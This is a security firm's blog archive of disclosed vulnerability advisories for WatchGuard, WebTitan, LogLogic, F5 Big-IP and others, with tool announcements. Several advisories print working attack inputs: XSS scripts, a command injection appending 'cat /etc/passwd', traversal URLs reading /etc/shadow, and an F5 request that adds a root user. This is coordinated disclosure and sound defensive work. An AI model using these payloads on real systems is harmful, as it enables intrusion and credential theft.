Sec-1 Penetration Testing Workshop

Posted on November 23, 2011 by Gary O'leary-Steele

Download the slides and supporting tools presented at the Sec-1 Penetration Testing Workshop:

Note: You will need to obtain the password from your account manager

Testing Workshop (Slides Only)

Slides and Tools

Posted in News | Comments Off

Advisory: Multiple WatchGuard Log and Report Manager Vulnerabilities

Posted on December 22, 2011 by waynem
Sec-1 Security Advisory
Advisory Name : WatchGuard Log and Report Manager: Persistent Cross-Site-Scripting (XSS) Vulnerability
Release Date : 16/12/2011
Application : WSM 11.5.1 Log and Report Manager
Platform : Windows
Severity : HIGH. Persistent XSS
Author : Wayne Murphy
Vendor Status : Fixed in WSM 11.5.1 Update 1
Website : http://www.sec-1.com/blog
Vulnerability Summary:
Cross site scripting vulnerabilities were discovered within the Log and Report Manager component of WatchGuard System Manager Version 11.5.1.
Version 11.5.1 introduced the new Log and Report Manager (web interface) replacing the older LogViewer, Report Manager and Reporting Windows client components. The introduction of this web component introduced two types of cross site scripting vulnerabilities; Persistent and Reflected. With the persistent XSS vulnerability it is possible to send traffic containing malicious scripts to a WatchGuard XTM Firebox firewall that is sending logs to a WatchGuard LogServer. Upon viewing the logs within the new Log and Remote Manager Web UI, the malicious scripts then execute, potentially allowing attackers to gain elevated privileges in the users browser. The reflected XSS vulnerabilities allows an attacker to embed script code into maliciously formatted links. If the attacker enticed the user to follow the links, the embedded script code would then execute. The following line is taken from WatchGuard’s Release Notes for WSM 11.5.1 Update 1 “These vulnerabilities do not allow the attacker to gain access to your XTM appliance or change firewall rules, but could potentially allow the attacker to gain unauthorized access to your computer.”
Exploit 1: Persistent XSS : FTP Method
Script code embedded within the FTP username value is insecurely stored and retrieved from the database. Upon viewing the FTP Log within Log and Report Manager the embedded script code executes in the users browser.

Example:

Entering the username value: <script>alert(“Username_XSS”)</script>

Embeds the following escaped log entry within the Watchguard LogServer Database:

command=USER \x3cscript\x3ealert(\x22Username_XSS\x22)\x3c/script\\3e

When the malicious log entry is viewed the embedded script code executes within the browser.

Exploit 1: Persistent XSS : SMTP Method
SMTP was also targeted during testing since this service is more commonly encountered during real world penetration testing. Furthermore, based on data collected from our firewall team, it is considered more likely that application aware proxies (with logging enabled) will be used for SMTP traffic.
The WatchGuard’s SMTP-Proxy logs all headers that are stripped from SMTP emails. By sending script code within a invalid SMTP header, data is insecurely stored and retrieved by the application allowing for Cross-Site-Scripting attacks.
For example, submitting the following SMTP header via the WatchGuard SMTP service will embed a JavaScript designed to display an alert box:

Bogus: \x3cscript\x3ealert(\x22XSS_Test_With_Encoding\x22)\x3c/script\x3e

Exploit 2: Reflected XSS
The following two parameters were found to be be vulnerable to Reflected XSS attacks.

https://:4130/ - URL Parameter
https://:4130/auth/login - from_page Parameter
N.B. Modern browsers were unable to exploit the URL Parameter attack vector. An intercepting proxy had to be used to exploit this successfully.
Vendor Response:
The vendor has patched these issues in WSM Version 11.5.1 Update 1. A WatchGuard advisory has been released relating to these vulnerabilities;

http://watchguardsecuritycenter.com/2011/12/15/watchguard-releases-wsm-v11-5-1-update-1-xss-flaws-corrected/
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-4774
Copyright 2011 Sec-1 LTD. All rights reserved.
Posted in Advisories | Comments Off

Advisory: Multiple Splunk Vulnerabilities

Posted on December 15, 2011 by Gary O'leary-Steele
Sec-1 Security Advisory
Advisory Name : Splunk Multiple Vulnerabilities
Release Date : 14/12/2012
Application : Splunk 4.2.4, 4.2.3 and 4.2.2 tested
Platform : Windows & Linux
Severity : Remote Compromise (root)
Author : Gary O’Leary-Steele
Vendor Status : Fixed in 4.2.5
Website : http://www.sec-1.com/blog
Vulnerability Summary:
Multiple vulnerabilities were discovered that could be exploited to gain remote code execution as the root/localsystem user. A full description of the discovered vulnerabilities can be found here: Download
Exploit:
Exploit code designed for use in penetration testing can be downloaded here: Download
Vendor Response:
The vendor has patched the issue in version 4.2.5. Sec-1 would like to thank Splunk for their prompt and professional response.
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : See PDF
Copyright 2011 Sec-1 LTD. All rights reserved.
Posted in Advisories | Comments Off

Advisory: WebTitan Multiple Vulnerabilities

Posted on October 20, 2011 by waynem
Sec-1 Security Advisory
Advisory Name : WebTitan Multiple Vulnerabilities
Release Date : 19/10/2011
Application : WebTitan version 3.50 (Build 183)
Platform : VMWare Appliance
Severity : SQL injection, Command injection, Dir Traversal
Author : Richard Conner
Vendor Status : Fixed in Version 3.60
Website : http://www.sec-1.com/blog
Product Overview:
Taken from: http://www.webtitan.com/products

WebTitan is a complete internet monitoring software (web filter) which provides organisations protection for their data from malware and other internet threats such as viruses, spyware and phishing as well as providing user policy browsing tools to ensure corporate internet policy is adhered to.
Vulnerability Summary:
A number of security issues were identified in version 3.50 (Build 183). A SQL injection attack within the authentication component can be leveraged to recover the password hashes of valid users. Once authenticated access is obtained further attacks exist. Additional SQL injection, Command Injection providing access to the FreeBSD O/S and a Directory Traversal flaw can be exploited.
Exploit 1: PRE Auth – Blind SQL Injection
The following vulnerability was identified

Login Page: http://172.31.1.25/login.php

This vulnerable component can be accessed without Authenticating. The affected script provides a web interface to the authentication component of the application. From here it is possible to perform any administrative task includinguser administration and running diagnostics.

Vulnerable Script: /login-x.php

Vulnerable POST request:
jaction=login&language=en_US&username=admin&password=hiadmin
Vulnerable Parameter: username
Database: POSTGRES

It is possible to perform blind SQL injection within the username parameter to recover the contents of various tables from the public database, including the admin table which contains the usernames and a MD5 hash of the password for each administrative account.
Exploit 2: POST Auth – SQL Injection
Once Authenticated, either through compromising of the PRE-Auth SQL injection
flaw or through a known administrative account (default values, brute force, etc) it is possible to perform several further SQL injection attacks against the following;

Vulnerable Script: /urls-x.php

Vulnerable POST Parameters: bldomain, wldomain, temid
Exploit 3: POST Auth – Command Injection
The Traceroute or Ping functionality when issued by an authenticated user can be abused to execute an additional command by the script. Appending two ampersands && characters to the Ping or Traceroute command causes the script to execute the instruction as a second command. The returned data is displayed within the diagnostic message within the users web browser.

Example:

http://172.31.1.25/tools.php#tab0

127.0.0.1 && cat /etc/passwd

Will display the contents of the password file which lists the FreeBSD users and their privileges.
Exploit 4: POST Auth – Dir Traversal
Example:

http://[HOST_IP]//logs-x.php? jaction=view&fname=../../../../../etc/passwd
Vendor Response:
These issues were resolved in version 3.60
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-4638 (SQL Injection Issues)
CVE : CVE-2011-4639 (POST Auth. Command Injection Issues)
CVE : CVE-2011-4640 (POST Auth. Dir Traversal)
Copyright 2011 Sec-1 LTD. All rights reserved.
Posted in Advisories | Comments Off

Advisory: Loglogic 5.1 Directory Traversal

Posted on July 6, 2011 by Gary O'leary-Steele
Sec-1 Security Advisory
Advisory Name : Loglogic 5.1 Directory Traversal
Release Date : 06/06/2011
Application : MX3020-PCI Edition / MX Virtual Appliance
Platform : Linux / Appliance
Severity : Remote Compromise (root)
Author : Gary O’Leary-Steele
Vendor Status : Fixed in HF-3 for version 5.1
Website : http://www.sec-1.com/blog
Vulnerability Summary:
A directory traversal vulnerability was identified within the Loglogic web interface. The vulnerability could be exploited by an unauthenticated attacker to gain access to any file on the local file system. For example, the attacker could extract the local /etc/shadow file and launch an offline password attack to recover the root password. Successful exploitation of this vulnerability could provide full control over the affected log management device including any stored reports and log files.
Exploit:
The following URL will download the /etc/shadow file:

https://[IP]/logapp20/downloadreportzip?file=/../../../../../../../etc/shadow
Vendor Response:
The vendor has patched the issue in HF-3 for version 5.1
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-2781
Copyright 2011 Sec-1 LTD. All rights reserved.
Posted in Advisories | Comments Off

Advisory: F5 Networks Big-IP Multiple Vulnerabilities

Posted on July 4, 2011 by Gary O'leary-Steele
Sec-1 Security Advisory
Advisory Name : F5 Networks Big-IP Multiple Vulnerabilities
Release Date : 04/07/2011
Application : F5 Networks Big-IP 10.1.0
Platform : Local Traffic Manager Virtual Edition (tested)
Severity : Privilege Escalation (to root), CSRF and XSS
Author : Gary O’Leary-Steele
Vendor Status : Patch Released
Website : http://www.sec-1.com/blog
Product Overview:
Taken from: http://www.f5.com/products/big-ip/

The BIG-IP product family is a system of integrated application delivery services that work together on the same best-in-class hardware. From load balancing, SSL offload, and web acceleration to application security, access control, and much more, a single BIG-IP device can do the work of a dozen single-purpose appliances.

Local Traffic Manager Virtual Edition enables you to create a mobile, scalable, and adaptable infrastructure for virtualized applications by applying the functionality of BIG-IP LTM in a virtualized environment.
Vulnerability Summary:
A number of security issues were identified within the management web interface that could be combined to gain unauthorised root access to the affected system. Identified vulnerabilities include Privilege Escalation, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF/XSRF).
Vulnerability Details – Privilege Escalation:
The following vulnerable script was identified during an analysis of the local file system:

https://[TARGET_IP]/tmui/tools/dbeditor.jsp

To access this component the user must be authenticated to the web interface as any user (including guest). The affected script provides a web interface to the underlying database along with easy to use templates to change database data. From here it is possible to perform any administrative task including user administration.

From an attackers perspective this interface allows any user, including Guest, to administer any aspect of the Big-IP’s configuration.
Exploit Example 1:
The following URL, when accessed by any authenticated user will add a root equivalent the user “hacker2? with a password of “admin” to the affected Big-IP system (adds and entry to /etc/shadow):

https://[TARGET_IP]/tmui/tools/commandresults.jsp?sql=INSERT into userdb_entry value(‘hacker2′,12345,’$1$vj2xXJiEZC0aIA.IBj5rvaEfbDgr0′,’true’,”,0,0,’/home/hacker2′,’/bin/sh’,0,”,’false’,’all’)

This vulnerability could be exploited using common Cross-Site Request forgery techniques such as an embedded IMG tag.
Exploit Example 2:
The following URL will extract password hashes from the /etc/shadow file:

https://[TARGET_IP]/tmui/tools/commandresults.jsp?sql=select * from userdb_entry
Vulnerability Details – Cross Site Scripting:
Errors returned by the affected script(s) are written to the page without encoding and can therefore be exploited to perform an XSS attack. Furthermore, since the resulting error can be constructed using SQL it is possible to form a payload that will bypass local XSS filters.
Exploit Example 3:
https://[TARGET_IP]/tmui/tools/commandresults.jsp?sql=select%20name,passwd%20from%20userdb_entry%20union%20select%20%27%3Cscript%3Ealert%281%29%3C/script%3E%27,%27b%27%20from%20userdb_entry
Vendor Response:
This issue was resolved in version 10.2.2 and within the hotfix release 10.2.1-hf1
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2011-3121
Copyright 2011 Sec-1 LTD. All rights reserved.
Posted in Advisories | Comments Off

Tool: Blind SQL Injection exploit tool

Posted on January 27, 2011 by Gary O'leary-Steele

Sec-1 Blind Injector (sec1blindinjector.rb)

The sec1blindinjector.rb tool is designed to exploit blind SQL injection vulnerabilities in Microsoft SQL Server  based applications. Whilst there are many good tools already out there such as SQLMap, this tool offers a number of unique features we have found useful during penetration testing.

Features

  • Search tables for columns names containing a specific key word (e.g. password)
  • Search all tables and databases for columns containing specific data (e.g admin)
  • Enumerate table and column names
  • Extract table data
  • Perform a dictionary attack against the local or accessible SQL server (SQL server 2000 only)
  • Execute operating system commands via cracked “sa” account

Download here: sec1blindinjector

Posted in Tools | Leave a comment

Tool: Identify vulnerable share permissions to prevent data leakage

Posted on January 25, 2011 by Gary O'leary-Steele

Windows File Sharing Vulnerabilities

Windows file sharing permissions are based on the popular  Discretionary Access Control (DAC) model, this essentially means that the owner of the resource uses his or her  discretion when deciding who should be permitted access. Access is granted to either an individual user or a group of users, unfortunately file shares are rarely configured with security as a top priority and the course of least resistance is often applied. Vulnerabilities commonly arise when access to a confidential resource is granted to a group containing users who should not permitted to access it, or generalised group such as “Everyone” has erroneously been included.

Download: ShareCheck

 

 

Sec-1 ShareCheck

Sec-1 ShareCheck was written during a penetration test to assess  a given IP Address range for weak file share permissions. The  output of the tool produces a HTML table containing:

  • The IP Address
  • Account Lockout Threshold
  • A list of Local Administrators
  • Shares which the supplied user can access
  • Shares which the  supplied user can write to

In the course of a penetration test local administrator accounts could then be targeted in an attempt to compromise the host and network.

Usage

ShareCheck is a command line tool written in Python.

To use ShareCheck configure a user account with limited permissions, i.e. a regular user. The results of running ShareCheck will illustrate what this user can and cannot access.

Command line example:

Assess the IP range 192.168.0.1-254 using the username “Bob” and the password “datastealer” and will save the results in report.html:

sharecheck.exe 192.168.1.0/24 bob datastealer report.html
Posted in Tools | 1 Comment

Paper: Buffer Truncation Abuse in Microsoft SQL Server Based Applications

Posted on October 12, 2007 by Gary O'leary-Steele

This paper is designed to document an attack technique Sec-1 recently adopted during the course of their application assessments. The basic principal of this technique has existed for some time; however we hope this paper we will provide an insight of how a variation of the technique can be adopted to attack common forgotten password functionality within web applications.

The document is split into two sections. The first section covers the principals of the technique and the second is an attack case study against a commercial application.

Download: Buffer Truncation Abuse Paper

Posted in White Papers | Leave a comment

Advisory: Collaboration Data Objects Buffer Overflow Vulnerability

Posted on October 12, 2005 by Gary O'leary-Steele 
                                SEC-1 LTD.
                              www.sec-1.com


Collaboration Data Objects Buffer Overflow Vulnerability
Application: Multiple Applications that implement CDO
Platform:Windows
Severity: Critical. Remote Code Execution
Author: Gary O'leary-Steele
Vendor Status:Patch Released
CVE Candidate:CAN-2005-1987
Reference:http://www.sec-1.com
Disclosed:12/October/2005
Vulnerability Details:

Sec-1 has identified an exploitable Buffer Overflow within Collaboration Data
Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks
are used within Microsoft Exchange 2000 or Microsoft Mail services to parse
Email content. Several Content Security packages were identified to be vulnerable.
The vulnerability can be exploited by crafting an email with a large header
name such as "Content-Type<LARGE STRING>:". A failiure to correctly determine
the length of the string results in a stack overflow. Sucessful exploitation
of the vulnerability could allow the attacker to gain complete control of the
vulnerable host. In somecases the vulnerability can also be used to bypass
content security mechanisms such as virus and content scanners. 
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx
Exploit Download: cdo_exploit
Posted in Advisories | Leave a comment